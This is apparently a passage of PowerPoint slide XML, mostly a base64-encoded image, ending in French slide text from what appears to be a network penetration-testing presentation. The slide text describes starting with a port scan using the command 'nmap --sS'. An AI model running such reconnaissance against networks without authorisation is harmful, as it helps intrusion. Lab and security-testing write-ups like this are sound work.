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57224" y="2214554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Pour commencer, nous avons lancer un scan sur le réseau pour voir s’il ya des ports qui sont ouverts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Pour cela, nous avons utiliser la commande ci-dessous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0"/>
